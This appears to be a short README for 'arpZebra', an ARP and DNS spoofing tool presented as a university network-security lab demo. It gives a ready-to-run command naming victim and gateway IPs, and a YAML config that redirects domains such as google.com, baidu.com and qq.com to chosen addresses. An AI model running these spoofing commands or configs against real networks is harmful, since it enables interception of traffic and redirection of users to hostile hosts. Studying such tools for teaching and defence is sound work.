Home

Awesome

arpZebra

ARP+DNS欺骗工具,通达网络安全第三次实验,课堂演示用,严禁非法用途。ARPSpoof,wifi hijack,dns spoof

Usage:

./arpZebra -interface wlp5s0 -target "192.168.1.100,192.168.1.1" -gateway "192.168.1.1" -dnscfg ./config.yml


DNS欺骗配置文件语法

targets:
  - address: 10.0.0.8
    matches:
      - "google\\.com"
      - ".\\.google\\.com"
  - address: 192.168.1.105
    matches:
      - "."
  - address: 192.168.1.100
    matches:
      - ".\\.baidu\\.com"
      - ".\\.qq\\.com"